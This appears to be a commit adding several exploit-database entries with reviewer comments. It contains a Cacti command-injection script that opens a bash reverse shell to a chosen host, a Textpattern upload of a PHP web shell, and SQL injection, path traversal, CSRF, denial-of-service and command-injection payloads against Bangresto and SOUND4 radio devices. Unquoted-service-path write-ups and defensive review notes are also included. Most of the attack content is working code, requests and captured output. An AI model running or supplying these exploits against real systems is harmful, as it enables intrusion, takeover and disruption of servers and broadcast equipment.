self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)
self.rs_host = rs_host
self.rs_port = rs_port
def exploit(self):
# cacti local ip from the url for the X-Forwarded-For header
local_cacti_ip = self.url.split("//")[1].split("/")[0]
headers = {
'X-Forwarded-For': f'{local_cacti_ip}'
}
revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
import base64
b64_revshell = base64.b64encode(revshell.encode()).decode()
payload = f";echo {b64_revshell} | base64 -d | bash -"
payload = urllib.parse.quote(payload)
urls = []
# Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
for host_id in range(1,100):
for local_data_ids in range(1,100):
urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")
for url in urls:
r = self.session.get(url,headers=headers)
print(f"{r.status_code} - {r.text}" )
pass
def random_user_agent(self):
ua_list = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
]
return random.choice(ua_list)
def parse_args():
import argparse
argparser = argparse.ArgumentParser()
argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")
argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)
argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)
return argparser.parse_args()
def main() -> None:
# Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
args = parse_args()
e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
e.exploit()
if __name__ == "__main__":
main()
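Review bot: `-u/--url` is not marked `required=True` in `parse_args()`, so omitting it passes `None` into `Exploit` and the first `self.url.split("//")` fails with an AttributeError instead of a usage message. The module imports `urllib` but calls `urllib.parse.quote`, which only works because another import happens to load the submodule; `import urllib.parse` states the dependency. `verify=False` is hard-coded on the client, and the trailing `pass` in `exploit()` is dead code. For readers on the defending side, the header lists `1.2.2x <= 1.2.22` as tested but no fixed release. The request shape in the loop (`remote_agent.php?action=polldata` with a non-numeric `poller_id` and a client-supplied `X-Forwarded-For`) is what access logs and filtering rules should be checked against.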


@ -0,0 +1,56 @@
## Exploit Title: Bangresto 1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto
## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.
## STATUS: CRITICAL Vulnerability
[+] Payload:
```MySQL
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)
## Proof and Exploit:
[href](https://streamable.com/moapnd)
## Time spent
`00:30:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


@ -0,0 +1,132 @@
# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
# Step 1: Login admin account and go settings of site
# Step 2: Upload a file to web site and selecet the rce.php
# Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########
========>>> START REQUEST <<<=========
############# POST REQUEST (FILE UPLOAD) ############################## (1)
POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"
1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"
async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"
file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"
file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"
16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--
############ POST RESPONSE (FILE UPLOAD) ######### (1)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8
___________________________________________________________________________________________________________________________________________________
############ REQUEST TO THE PAYLOAD ############################### (2)
GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close
############ RESPONSE THE PAYLOAD ############################### (2)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>alpernae\alperen
</pre>
========>>> END REQUEST <<<=========
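Review bot: The two halves of the PoC do not line up: the upload part declares `filename="rce.php"`, but the follow-up request fetches `/files/c.php`. One of them appears to come from a different run, and the entry should use a single name throughout so the stored path is unambiguous. The captured `txp_login` cookie and `_txp_token` value are from the author's session and should be placeholders. Since the steps require an authenticated admin and the file ends up under the web-served `/files/` path, the mitigation worth recording is to deny script execution in that directory.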


@ -0,0 +1,32 @@
# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path
# Date: 11/17/2022
# Exploit Author: Damian Semon Jr (Blue Team Alpha)
# Version: 1.8.5
# Vendor Homepage: https://masterplus.coolermaster.com/
# Software Link: https://masterplus.coolermaster.com/
# Tested on: Windows 10 64x
# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto
# Info on the service:
C:\>sc qc MPService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MPService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CoolerMaster MasterPlus Technology Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger.
Ex: (C:\Program.exe)
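Review bot: The write-up omits the precondition that decides whether this unquoted path is reachable: the locations Windows tries before the real binary sit in the drive root, where standard users cannot create files under default ACLs. The finding therefore matters mainly on hosts where the `C:\` ACL has been loosened, and the entry should say so. I would also add a remediation line, e.g. `# Fix: wrap the service ImagePath in double quotes and re-check with sc qc MPService`. The same gap applies to the SOUND4 Server write-up that follows, whose `cacls` output covers only the service binary and not the directories searched ahead of it.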


@ -0,0 +1,61 @@
# Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: 4.1.102
Summary: SOUND4 Windows Server Service.
Desc: The application suffers from an unquoted search path issue impacting
the service 'SOUND4 Server' for Windows. This could potentially allow an
authorized but non-privileged local user to execute arbitrary code with
elevated privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path undetected
by the OS or other security applications where it could potentially be executed
during application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
Tested on: Windows 10 Home 64 bit (build 9200)
SOUND4 Server v4.1.102
SOUND4 Remote Control v4.3.17
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5721
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php
26.09.2022
--
C:\>sc qc "SOUND4 Server"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SOUND4 Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SOUND4 Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"
C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V
4.1.102


@ -0,0 +1,69 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5722
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php
26.09.2022
--
PoC:
----
<form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST">
<input type="submit" value="Disappear" />
</form>
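Review bot: The entry records no remediation for the cross-site POST to `logoremove.cgi` shown in the form. A line such as `# Fix: require a per-session anti-CSRF token on every state-changing CGI and set SameSite on the session cookie` would cover it. The description limits the issue to "certain actions" without listing them, so a reader cannot tell which other endpoints need the same token check.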


@ -0,0 +1,165 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application is vulnerable to insecure direct object references
that occur when the application provides direct access to objects based
on user-supplied input. As a result of this vulnerability attackers can
bypass authorization and access the hidden resources on the system and
execute privileged functionalities.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5723
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php
26.09.2022
--
(GET|POST) /** HTTP/1.1
/var/www/:
----------
.SOUND4
about.php
actioninprogress.php
broken_error.php
cfg_filewatch.xml
cfg_filewatch_specific.xml
checklogin.php
checkserver.php
config.php
datahandlerdlg.php
descrxml.php
dns.php
downloads
downloads.php
fullrebootsystem.php
global.php
globaljs.php
guifactorysettings.xml
guixml.php
guixml_error.php
header.php
images
index.php
isreboot.php
jquery-3.2.1.min.js
jquery-plugins
jquery-ui-custom
jquery-ui-i18n.js
jquery-ui.css
jquery-ui.js
jquery.js
jquery.ui.touch-punch.min.js
killffmpeg.php
linkandshare.php
login.php
logout.php
monitor.php
networkdiagnostic.php
partialrebootsystem.php
ping.php
playercfg.xml
rebootsystem.php
restoreinprogress.php
script.min.js
secure.php
serverinprogress.php
settings.php
setup.php
setup_ethernet.php
style.min.css
traceroute.php
upgrade
upgrade.php
upgradeinprogress.php
uploaded_guicustomload.php
uploaded_kantarlic.php
uploaded_licfile.php
uploaded_logo.php
uploaded_presetfile.php
uploaded_restorefile.php
uploaded_upgfile.php
validate_tz.php
ws.min.js
ws.php
wsjquery-class.min.js
www-data-handler.php
/usr/cgi-bin/:
--------------
(GET|POST) /** HTTP/1.1
backup.cgi
cgi-form-data
downloadkantarlic.cgi
ffmpeg.cgi
frontpanel
getlogs.cgi
getlogszip.cgi
guicustomsettings.cgi
guicustomsettingsload.cgi
guifactorysettings.cgi
importpreset.cgi
loghandler.php
logo
logoremove.cgi
logoupload.cgi
phptail.php
printenv
printenv.vbs
printenv.wsf
restore.cgi
restorefactory.cgi
test-cgi
upgrade.cgi
upload.cgi
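Review bot: The listing shows what is reachable but not which control is missing. It also includes stock sample CGI scripts (`printenv`, `printenv.vbs`, `printenv.wsf`, `test-cgi`) that should not ship on a production device at all. I would add a remediation note such as `# Fix: enforce the session check in one place for every script under /var/www and /cgi-bin, and remove sample/diagnostic CGIs`. Whether `checklogin.php` or `secure.php` are meant to provide that check cannot be told from the listing.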


@ -0,0 +1,74 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application allows an unauthenticated attacker to disconnect the
current monitoring user from listening/monitoring and takeover the radio
stream on a specific channel.
------------------------------------------------------------------------
/var/www/killffmpeg.php:
------------------------
01: <?php
02: $ret=0;
03: exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret);
04: echo $ret;
05: ?>
------------------------------------------------------------------------
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5725
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php
26.09.2022
--
> curl -sko -nul https://RADIO/killffmpeg.php
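Review bot: `killffmpeg.php` as quoted (lines 01-05) reaches `exec()` with no session or login check, which is the root cause, yet the advisory neither says so nor gives a fix. A line such as `# Fix: gate the script behind the authenticated session and accept POST only` would make the entry actionable. The script also signals whatever PID is stored in `/tmp/webplay.pid`. If other local accounts can write that file (not shown here), the kill target is untrustworthy, so the PID should be validated as numeric and matched to the player process before it is signalled.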


@ -0,0 +1,67 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application suffers from an SQL Injection vulnerability. Input
passed through the 'password' POST parameter in 'index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This
can be exploited to manipulate SQL queries by injecting arbitrary SQL code
and bypass the authentication mechanism.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5726
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php
26.09.2022
--
POST /index.php HTTP/1.1
username=t00t&password='+joxy--+z
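Review bot: The description attributes the bypass to SQL injection in the `password` parameter of `index.php`, but no query or server-side code is shown to support that classification. The `login.php` excerpt in the command-execution write-up from this same commit shows the password being concatenated into a shell pipeline rather than a SQL statement. The root cause may therefore be the same input-handling flaw under a different label; this is an inference from that excerpt and should be confirmed against `index.php`. Either way the entry would benefit from a remediation line, e.g. `# Fix: never build the credential check from raw POST data; pass values as bound parameters`.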


@ -0,0 +1,80 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application suffers from an unauthenticated directory traversal
file write vulnerability. Input passed through the 'filename' POST parameter
called by the 'upgrade.php' script is not properly verified before being used
to upload .upgbox Firmware files. This can be exploited to write to arbitrary
locations on the system via directory traversal attacks.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5730
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php
26.09.2022
--
POST /cgi-bin/upload.cgi HTTP/1.1
Host: RAAAADIOOO
Content-Type: multipart/form-data; boundary=----zzzzz
User-Agent: TheViewing/05
Accept-Encoding: gzip, deflate
------zzzzz
Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"
Content-Type: application/octet-stream
t00t
------zzzzz
Content-Disposition: form-data; name="submit"
Do it
------zzzzz--
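Review bot: The description and the request disagree on the entry point. The text names the `filename` POST parameter of `upgrade.php`, while the request targets `/cgi-bin/upload.cgi` and carries the path in the multipart `filename` attribute of the `upgfile` part. Stating which script actually writes the file matters to anyone patching it or writing a detection. A remediation line is also missing; I would add `# Fix: discard the client-supplied filename (basename() at minimum), write to a server-chosen path, and require authentication`. For detection, a multipart `filename` value containing `../` in a request to the upload CGI is a strong indicator.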


@ -0,0 +1,75 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The application suffers from an unauthenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell
commands through the 'password' HTTP POST parameter through index.php and
login.php script.
========================================================================
/var/www/login.php:
-------------------
09: if (isset($_POST['username']) && isset($_POST['password'])) {
10:
11: $ret = -1;
12: // remarque: Check Password for broken, only admin/admin as valid user/password
13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);
========================================================================
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5738
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php
26.09.2022
--
> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g
uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)
